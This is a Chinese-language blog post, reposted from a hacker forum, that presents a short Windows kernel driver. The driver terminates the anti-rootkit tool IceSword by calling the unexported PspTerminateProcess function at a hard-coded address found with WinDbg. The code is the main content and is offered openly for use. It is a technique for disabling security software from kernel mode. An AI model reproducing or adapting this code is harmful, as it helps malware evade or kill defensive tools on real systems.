分类

学习笔记 [17]
渗透测试 [4]
一些杂文 [14]
coding [16]
漏洞信息 [17]
技术文章 [15]
开发文档 [8]
个人作品 [5]
PS:个人作品在各种下载栏目均有下载

站内搜索

日历

«  April 2010  »
Su Mo Tu We Th Fr Sa
    123
45678910
11121314151617
18192021222324
252627282930

友情链接

  • 莫良博客
  • 冷夜博客
  • 八神博客
  • Tm3yShell7
  • 2idy电影网
  • Blueandhack's Blog
  • 幻泉博客
  • 羽蛇
  • Elaf
  • 小冰's Blog

    • 访问统计(起于2010/10/2)

    访问统计
    PortWatcher's Blog
    Monday, 2025-06-30, 9:50 AM
    Welcome Guest
    Main | Registration | Login | RSS

    Blog

    Main » 2010 » April » 01 » 最简洁的代码结束冰刃
    12:01 PM
    最简洁的代码结束冰刃
    转自黑客防线论坛黑客编程板块

    Code
      
    #include  <windows.h>

    typedef NTSTATUS (*PSPTERPROC) ( PEPROCESS Process, NTSTATUS ExitStatus );  
    PSPTERPROC MyPspTerminateProcess ;  
    NTSTATUS  
    PsLookupProcessByProcessId(  
      IN HANDLE ProcessId,  
      OUT PEPROCESS *Process  
      );  

    void Unload(PDRIVER_OBJECT pDriverObj)  
    {  
      DbgPrint("Driver Stop\n");  
    }  

    NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObj, PUNICODE_STRING pRegistryString)  
    {  
      PEPROCESS hProcess;  
      MyPspTerminateProcess =(PSPTERPROC)0x805c8642;  

      //比如冰刃的进程ID为1732  
      if(PsLookupProcessByProcessId(1732,&hProcess)==STATUS_SUCCESS)  
      {  
      MyPspTerminateProcess(hProcess,0);  
      }  
      pDriverObj->DriverUnload = Unload;  
      return STATUS_SUCCESS;  
    }  

    以上代码使用了系统未导出函数PspTerminateProcess结束了冰刃,
    函数的地址是我用WinDbg看到的,所以可能在不同的系统里地址不同。
    Category: coding | Views: 720 | Added by: Jury | Rating: 5.0/1
    Total comments: 0
    Name *:
    Email *:
    Code *:

    admin@portwatcher.net |